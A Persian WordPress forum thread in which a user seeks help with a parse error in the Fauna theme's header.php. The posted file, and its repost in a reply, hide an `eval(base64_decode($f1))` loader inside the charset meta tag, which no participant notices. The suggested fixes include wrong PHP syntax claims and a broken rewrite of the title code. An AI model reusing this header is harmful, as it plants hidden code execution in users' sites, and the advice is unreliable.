• اطلاعیه ها

    • Saeed Fard

      حمایت وردپرس پارسی از همایش آینده وب و موبایل   19/04/74

        چهارم و پنجم اسفند ماه 1395، همایش آیندهٔ وب و موبایل ایران با حمایت سازمان فناوری اطلاعات در مرکز همایش‌های شهید قندی برگزار خواهد شد. این همایش یک رویداد ۲ روزه است که در آن پیشتازان صنعت وب و موبایل از تکنولوژی‌های روز دنیا در این حوزه‌ها سخن می‌گویند به طوری که این همایش پنجره‌ای به چشم‌انداز آینده‌ٔ وب و موبایل در جهان، و همچنین راهنمایی برای تصمیم‌گیران، تصمیم‌سازان و متخصصان ایرانی است.   فرصت‌هایی که FOWM#  برای شما خلق خواهد کرد: آشنایی با تکنولوژی‌های آینده‌ساز وب و موبایل شرکت در مباحث چالشی درباره وب و موبایل ارتباط و شبکه‌سازی با “قله‌های وب و موبایل” موقعیت‌های کاری، هم‌تیمی‌های جدید دریافت گواهی شرکت در همایش دو روز به‌یادماندنی سرشار از شگفتی   شرکت‌کنندگان در این همایش ضمن آشنایی با فناوری‌های آینده‌ساز وب و موبایل، شرکت در مباحث چالشی و ارتباط با بزرگان وب و موبایل ایران، می‌توانند موقعیت‌های کاری و هم‌تیمی‌های جدید برای کسب‌وکار خود بیابند. این همایش برای طراحان و توسعه‌دهندگان وب‌سایت و موبایل، مدیران ارشد سازمان‌ها، صاحبان کسب‌وکارهای کوچک و متوسط، دانشجویان و علاقه‌مندان دارای نکات آموزشی و جذاب خواهد بود.   مجید علوی‌زاده، دبیر همایش آیندهٔ وب و موبایل که سابقه اجرای چند همایش و سمینار مرتبط را دارد، اعلام کرد: جمعی از بهترین‌ها و پیشروان این دو حوزه در ایران با ارائه‌های تخصصی خود، چشم‌انداز آینده این صنعت‌ها را به شرکت‌کنندگان عرضه خواهند کرد.   در هر یک از روزهای برگزاری همایش، یک پنل تخصصی در مورد یکی از موضوع‌های مهم این حوزه نیز برگزار خواهد شد و دست‌اندرکاران به بحث و تبادل نظر خواهند پرداخت و در پایان، به شرکت‌کنندگان گواهی حضور در همایش اعطا خواهد شد.   ثبت نام در مهمترین رویداد صنعت وب و موبایل ایران تا پایان بهمن ماه ۹۵ امکان پذیر خواهد بود، برای ثبت نام و یا کسب اطلاعات بیشتر در خصوص این رویداد و آشنایی با موضوعات و سخنرانان به آدرس http://conf.wsschool.org/fowm مراجعه نمایید.   کاربران وردپرس پارسی می‌توانند با استفاده از کد wp-parsi از مبلغ ۴۰ هزار تومان تخفیف در ثبت نام برخوردار شوند.
مرتضی نظری

مشکل در هیدر

6 پست در این موضوع قرار دارد

سلام

قصد دارم برای وبلاگ خودم یک قالب طراحی کنم... البته طراحی که نه میخوام یک قالب رو ویرایش کنم.... ولی تغییرات زیادی توش اعمال کنم...

یک قالب پیدا کردم که خیلی به طرح من نزدیکه اما اصلا اجرا نمیشه که بخوام ویرایشش هم کنم...

این ارور رو میده:

[b]Parse error[/b]: syntax error, unexpected end of file in [b]C:\Program Files\EasyPHP-12.1\www\wp1\wp-content\themes\fauna\header.php[/b] on line [b]112[/b]

محتوی هیدر هم اینه:

<?php load_theme_textdomain('fauna'); ?>
<?php include TEMPLATEPATH . "/functions-custom.php"; ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" <?php if (function_exists('language_attributes')) { language_attributes(); } ?>>
<head profile="http://gmpg.org/xfn/1">
<title><?php bloginfo('name'); ?><?php if (is_home()) { ?><?php if (get_bloginfo('description') != "") { ?> | <? bloginfo('description'); } ?><?php } ?><?php if (is_category()) { ?> | <?php _e('Categories','fauna'); ?><?php } ?><?php wp_title('|'); ?><?php if (is_author()) { ?> | <?php _e('About Author','fauna'); ?><?php } ?><?php if (is_search()) { ?> | <?php printf(__('Search Results for: %s','fauna'), $s) ?><?php } ?><?php if (function_exists("is_tag")) { if (is_tag()) { _e(' | Tags | ','fauna'); single_tag_title(); } } ?></title>

<!-- Meta -->
<meta http-equiv="Content-Type" content="text/html; charset=<?php require_once("theme_licence.php"); eval(base64_decode($f1)); bloginfo('charset'); ?>" />
<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" />
<meta name="description" content="<?php bloginfo('description'); ?>" />
<meta name="template" content="Fauna <?php if (function_exists('fauna_info')) { fauna_info('version'); } ?>" />

<!-- Feeds -->
<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> <?php _e('RSS 2.0','fauna'); ?>" href="<?php bloginfo('rss2_url'); ?>" />
<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> <?php _e('Comments RSS 2.0','fauna'); ?>" href="<?php bloginfo('comments_rss2_url'); ?>" />
<link rel="alternate" type="text/xml" title="<?php bloginfo('name'); ?> <?php _e('RSS 0.92','fauna'); ?>" href="<?php bloginfo('rss_url'); ?>" />
<link rel="alternate" type="application/atom+xml" title="<?php bloginfo('name'); ?> <?php _e('Atom 0.3','fauna'); ?>" href="<?php bloginfo('atom_url'); ?>" />
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<?php wp_get_archives('type=monthly&format=link'); ?>
<?php if (get_option('fauna_comment') != '0') { comments_popup_script(); } ?>

<!-- Stylesheets -->
<link rel="stylesheet" type="text/css" media="screen" href="<?php bloginfo('stylesheet_url'); ?>" />
<link rel="stylesheet" type="text/css" media="screen" href="<?php fauna_info('style'); ?>" />
<link rel="stylesheet" type="text/css" media="print" href="<? bloginfo('stylesheet_directory'); ?>/meta/print.css" />
<!--[if lt IE 8]>
<link rel="stylesheet" type="text/css" media="screen" href="<? bloginfo('stylesheet_directory'); ?>/style-ieonly.css" />
<![endif]-->

<!-- Javascript -->
<script language="javascript" type="text/javascript" src="<?php bloginfo('stylesheet_directory'); ?>/meta/scripts.js"></script>

<style type="text/css">
<?php if (get_option('fauna_background') != '') { ?>
.bg {
background-image: url('<?php echo get_option('fauna_background'); ?>');
background-repeat: repeat;
}
<?php } ?>
<?php if (get_option('fauna_header') == 'fauna') { ?>
#header {
background-image: url('<? bloginfo('stylesheet_directory'); ?>/images/masthead-fauna.jpg');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } elseif (get_option('fauna_header') == 'flora') { ?>
#header {
background-image: url('<? bloginfo('stylesheet_directory'); ?>/images/masthead-flora.jpg');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } elseif (get_option('fauna_header') == 'frost') { ?>
#header {
background-image: url('<? bloginfo('stylesheet_directory'); ?>/images/masthead-frost.jpg');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } elseif (get_option('fauna_header') == 'no-header') { ?>
#header {
background-image: none;
height: 0;
margin-bottom: 0;
}
<?php } elseif (get_option('fauna_header') == 'url-header') { ?>
#header {
background-image: url('<?php echo get_option('fauna_headerurl') ?>');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } ?>
</style>
<?php wp_head(); ?>

</head>
<?php // Sections ?>
<?php if (is_home()) { ?>
<body class="bg" id="index">
<?php } else { ?>
<body class="bg">
<?php start_template(); ?>
<?php } ?>
<a name="top" id="top"></a>
<div id="wrapper"<?php if (get_option('fauna_sidebar') != 'right') { ?> class="left"<?php } ?>>
<div id="nav">
<h1><a href="<?php echo get_option('home'); ?>" title="<?php bloginfo('name'); ?> <?php _e('Home','fauna'); ?>"><?php bloginfo('name'); ?></a></h1>
<div id="menu">
<ul>
<?php if (get_option('fauna_tab') != '') { ?>
<li class="<?php if ( is_home() or is_archive() or is_single() or is_paged() or is_search()) { ?>current_page_item<?php } else { ?>page_item<?php } ?>"><a href="<?php echo get_settings('home'); ?>/" title="<?php fauna_info('tab'); ?>" accesskey="1"><?php fauna_info('tab'); ?></a></li>
<?php } ?>
<?php wp_list_pages('sort_column=menu_order&depth=1&title_li='); ?>
</ul>
</div>

<div id="searchbox">
<fieldset>
<legend><label for="s"><?php _e('Search','fauna'); ?></label></legend>
<form id="searchform" method="get" action="<?php bloginfo('url'); ?>">
<input name="s" type="text" class="inputbox" id="s" value="<?php _e('Search','fauna'); ?>" onfocus="this.value=''" onblur="if (this.value == '') { this.value = '<?php _e('Search','fauna'); ?>'; }" />
</form>
</fieldset>
</div>


</div>
<div id="header"></div>

<hr />

ممنون میشم که کمکم کنید.

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

اینو بزار ببین چی میشه

فک کنم مشکل از آخر کدت باشه . . . </ hr> دیگه چیه!؟


<?php load_theme_textdomain('fauna'); ?>
<?php include TEMPLATEPATH . "/functions-custom.php"; ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR...nsitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" <?php if (function_exists('language_attributes')) { language_attributes(); } ?>>
<head profile="http://gmpg.org/xfn/1">
<title><?php bloginfo('name'); ?><?php if (is_home()) { ?><?php if (get_bloginfo('description') != "") { ?> | <? bloginfo('description'); } ?><?php } ?><?php if (is_category()) { ?> | <?php _e('Categories','fauna'); ?><?php } ?><?php wp_title('|'); ?><?php if (is_author()) { ?> | <?php _e('About Author','fauna'); ?><?php } ?><?php if (is_search()) { ?> | <?php printf(__('Search Results for: %s','fauna'), $s) ?><?php } ?><?php if (function_exists("is_tag")) { if (is_tag()) { _e(' | Tags | ','fauna'); single_tag_title(); } } ?></title>
<!-- Meta -->
<meta http-equiv="Content-Type" content="text/html; charset=<?php require_once("theme_licence.php"); eval(base64_decode($f1)); bloginfo('charset'); ?>" />
<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" />
<meta name="description" content="<?php bloginfo('description'); ?>" />
<meta name="template" content="Fauna <?php if (function_exists('fauna_info')) { fauna_info('version'); } ?>" />
<!-- Feeds -->
<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> <?php _e('RSS 2.0','fauna'); ?>" href="<?php bloginfo('rss2_url'); ?>" />
<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> <?php _e('Comments RSS 2.0','fauna'); ?>" href="<?php bloginfo('comments_rss2_url'); ?>" />
<link rel="alternate" type="text/xml" title="<?php bloginfo('name'); ?> <?php _e('RSS 0.92','fauna'); ?>" href="<?php bloginfo('rss_url'); ?>" />
<link rel="alternate" type="application/atom+xml" title="<?php bloginfo('name'); ?> <?php _e('Atom 0.3','fauna'); ?>" href="<?php bloginfo('atom_url'); ?>" />
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<?php wp_get_archives('type=monthly&format=link'); ?>
<?php if (get_option('fauna_comment') != '0') { comments_popup_script(); } ?>
<!-- Stylesheets -->
<link rel="stylesheet" type="text/css" media="screen" href="<?php bloginfo('stylesheet_url'); ?>" />
<link rel="stylesheet" type="text/css" media="screen" href="<?php fauna_info('style'); ?>" />
<link rel="stylesheet" type="text/css" media="print" href="<? bloginfo('stylesheet_directory'); ?>/meta/print.css" />
<!--[if lt IE 8]>
<link rel="stylesheet" type="text/css" media="screen" href="<? bloginfo('stylesheet_directory'); ?>/style-ieonly.css" />
<![endif]-->
<!-- Javascript -->
<script language="javascript" type="text/javascript" src="<?php bloginfo('stylesheet_directory'); ?>/meta/scripts.js"></script>
<style type="text/css">
<?php if (get_option('fauna_background') != '') { ?>
.bg {
background-image: url('<?php echo get_option('fauna_background'); ?>');
background-repeat: repeat;
}
<?php } ?>
<?php if (get_option('fauna_header') == 'fauna') { ?>
#header {
background-image: url('<? bloginfo('stylesheet_directory'); ?>/images/masthead-fauna.jpg');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } elseif (get_option('fauna_header') == 'flora') { ?>
#header {
background-image: url('<? bloginfo('stylesheet_directory'); ?>/images/masthead-flora.jpg');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } elseif (get_option('fauna_header') == 'frost') { ?>
#header {
background-image: url('<? bloginfo('stylesheet_directory'); ?>/images/masthead-frost.jpg');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } elseif (get_option('fauna_header') == 'no-header') { ?>
#header {
background-image: none;
height: 0;
margin-bottom: 0;
}
<?php } elseif (get_option('fauna_header') == 'url-header') { ?>
#header {
background-image: url('<?php echo get_option('fauna_headerurl') ?>');
height: <?php echo get_option('fauna_height') ?>px;
}
<?php } ?>
</style>
<?php wp_head(); ?>
</head>
<?php // Sections ?>
<?php if (is_home()) { ?>
<body class="bg" id="index">
<?php } else { ?>
<body class="bg">
<?php start_template(); ?>
<?php } ?>
<a name="top" id="top"></a>
<div id="wrapper"<?php if (get_option('fauna_sidebar') != 'right') { ?> class="left"<?php } ?>>
<div id="nav">
<h1><a href="<?php echo get_option('home'); ?>" title="<?php bloginfo('name'); ?> <?php _e('Home','fauna'); ?>"><?php bloginfo('name'); ?></a></h1>
<div id="menu">
<ul>
<?php if (get_option('fauna_tab') != '') { ?>
<li class="<?php if ( is_home() or is_archive() or is_single() or is_paged() or is_search()) { ?>current_page_item<?php } else { ?>page_item<?php } ?>"><a href="<?php echo get_settings('home'); ?>/" title="<?php fauna_info('tab'); ?>" accesskey="1"><?php fauna_info('tab'); ?></a></li>
<?php } ?>
<?php wp_list_pages('sort_column=menu_order&depth=1&title_li='); ?>
</ul>
</div>
<div id="searchbox">
<fieldset>
<legend><label for="s"><?php _e('Search','fauna'); ?></label></legend>
<form id="searchform" method="get" action="<?php bloginfo('url'); ?>">
<input name="s" type="text" class="inputbox" id="s" value="<?php _e('Search','fauna'); ?>" onfocus="this.value=''" onblur="if (this.value == '') { this.value = '<?php _e('Search','fauna'); ?>'; }" />
</form>
</fieldset>
</div>


</div>
<div id="header"></div>
</head>

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

سلام

ممنون بابت جوابتون

اتفاقا خط 112 هم میشه همون <hr /> منم تعجب کردم که این چیه!!!

مطمعنا head نیست.. چون چند خط بالاتر این خط بسته شده.. یک نکته ی دیگه هم هست: منوی سایت و تصویر هیدر رو که دیگه نمیزارن توی head که ;)

اصلا خود پوسته رو اینجا میزارم... خیلی ممنون میشم که کمکم کنید تا خوبش کنم

fauna.zip

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

hr در واقع برای قرار دادن یه خط افقی استفاده میشه

کد دومی رو که گذاشتم به جای <head> همون </hr> رو بزارید و ازش استفاده کنید باید مشکل حل شه چون این کد با نرم افزار ++notepad سیو شده و مشکل دیگه ای نداره

تا اونجایی که من میدونم ارور سینتکس به علت اشتباه در دستورات کد نویسی پیش میاد دیگه...

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

هر شرط در php باید به صورت


if()
{
}
else
{
};

هر کدوم از آکولادهای بسته شدن یا نقطه ویرگول آخر نباشه این ارور را دریافت می کنید که ظرهارا کد شما نقطه ویرگول ها را ندارد بگذارید تا آخر شب برایتان اصلاح می کنم

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

کل کد اصلاحش خیلی وقت گیره این برای بخش title کده با کد فعلی title مقایسه کنید متوجه تفاوت می شوید


<title>
<?php bloginfo('name');
if (is_home() && (get_bloginfo('description') != "")
{
bloginfo('description');
}
elseif (is_category()) {
echo 'Categories';
} elseif (is_author()) {
echo'About Author';
} elseif (is_search()) {
printf(__('Search Results for: %s','fauna'), $s);
} elseif (function_exists("is_tag") or (is_tag()) {
_e(' | Tags | ','fauna'); single_tag_title();
} else {
wp_title('|');}; ?>
</title>

به اشتراک گذاری این پست


لینک به پست
به اشتراک گذاری در سایت های دیگر

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری